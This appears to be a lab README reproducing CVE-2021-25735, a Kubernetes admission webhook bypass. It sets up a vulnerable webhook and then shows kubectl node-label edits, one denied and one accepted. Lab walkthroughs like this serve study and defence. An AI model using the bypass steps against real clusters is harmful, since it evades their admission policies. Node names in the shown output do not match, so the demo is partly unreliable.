CVE-2021-25735

Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass

Set the Vulnerable Environment

Let's start with running the script gencerts.sh to generate TLS certificates and keys.
bash gencerts.sh

To deploy the admission controller you need to build the Docker container image locally, tag, and push the image to your Dockerhub using the below commands.
docker login
docker build -t validationwebhook:1.0 .
docker tag validationwebhook:1.0 darryk/dev:1.0
docker push darryk/dev:1.0

Now you can deploy the created image with the Node.js application into your K8s cluster. The webhook-deploy.yaml will deploy all the needed components in your cluster.
kubectl apply -f webhook-deploy.yaml

Let's now register our webhook with Kubernetes API Server. To do that, we create a Base64 of the ca.crt file created before and replace the CA_BUNDLE inside webhook-registration.yaml.
cat ca.crt | base64

Finally, we will register the webhook with the Kubernetes API Server.
kubectl apply -f webhook-registration.yaml

Exploit CVE-2021-25735

We do a change in the node label using edit nodes and we add a new label.
kubectl edit nodes ip-172-20-61-82.ec2.internal

  labels:  
    test: test  
    changeAllowed: "false"

Since the ChangeAllowed is set to "false" we get the following error:

error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed You can run kubectl replace -f /tmp/kubectl-edit-irc64.yaml to try this update again.

If we retry to modify the node performing the following change:\

  labels:  
    test: test  
    changeAllowed: "true"

In this case the edit action has been accepted bypassing the admission controller.